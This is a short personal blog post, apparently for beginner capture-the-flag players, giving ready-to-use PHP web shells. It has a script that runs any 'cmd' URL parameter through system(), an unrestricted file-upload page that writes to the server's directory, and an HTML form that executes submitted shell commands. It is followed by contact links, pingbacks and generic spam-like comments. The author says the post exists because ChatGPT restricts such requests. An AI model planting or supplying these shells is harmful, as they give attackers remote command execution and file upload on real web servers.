in my website i long form content and short form content like this, because i search this prompt in chatgpt that restrict this kind of prompts, that time i decited to post content like that
in most of beginner level CTF its mustly used script
PHP code for it get shell in URL
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST["cmd"]);
system($cmd);
echo "</pre>$cmd<pre>";
die;
}
?>
after execute this code you can get cmd in URL ,
Usage:
http://www.aathilducky.com/shell.php?cmd=ls
PHP code for upload file in Current location
<?php
if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_FILES['file'])) {
if (move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo "<b>File uploaded successfully!</b><br><br>";
} else {
echo "<b>File upload failed!</b><br><br>";
}
}
?>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="Upload">
</form>
after running this code , we can get interface for upload files , when you upload files thats stored in current location.
like this , for texting purpose i upload image in picoCTF challange it was successfully uploaded , i will give a screen short for it
and easy shell script for it , we can execute command easily
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
Contect information
- youtube : https://www.youtube.com/@aathilducky
- linkedin : https://www.linkedin.com/in/aathilducky
- Github : https://www.linkedin.com/in/aathilducky/
- Twitter : https://twitter.com/AathilDucky
Pingback: PicoCTF SSTI 1 challenge - AATHIL DUCKY
Pingback: picoCTF WebDecode Writeup - AATHIL DUCKY
Pingback: AI in Cybersecurity: How ChatGPT is Changing Ethical Hacking - AATHIL DUCKY
Pingback: What Is a Honeypot in Cybersecurity? with examples - AATHIL DUCKY
Pingback: PicoCTF Includes Walkthrough – Easy Guide to Finding the Flag - AATHIL DUCKY
Pingback: PicoCTF Cookies Walkthrough – Crack the Cookie Puzzle Fast! - AATHIL DUCKY
Pingback: PicoCTF Scavenger Hunt Walkthrough: Flag Hunting Fun! - AATHIL DUCKY
Hello! I just wanted to ask if you ever have any issues with hackers?
My last blog (wordpress) was hacked and I ended up losing a few months of hard work due to
no back up. Do you have any methods to stop hackers?
I visit everyday some web pages and information sites to read articles or reviews, however this website provides quality based posts.
I am now not certain where you’re getting your info, but great topic.
I needs to spend some time studying more or understanding more.
Thank you for excellent information I was on the lookout for this information for my mission.
You’re so interesting! I don’t suppose I have read through a single thing like that before.
So great to find another person with some genuine thoughts on this topic.
Seriously.. thank you for starting this up. This website is something that is required on the internet, someone
with a bit of originality!
I am regular visitor, how are you everybody? This paragraph posted at this website
is genuinely nice.
This post is invaluable. When can I find out more?
Greetings! Very useful advice within this post!
It is the little changes which will make the most important changes.
Thanks a lot for sharing!
Oh my goodness! Amazing article dude! Many thanks,
However I am experiencing troubles with your
RSS. I don’t understand why I am unable to join it. Is there anyone else getting similar RSS problems?
Anybody who knows the solution can you kindly respond?
Thanx!!
Hello, its good article on the topic of media print,
we all know media is a great source of data.
You have made some good points there. I checked on the internet for additional information about the issue and found most people will
go along with your views on this website.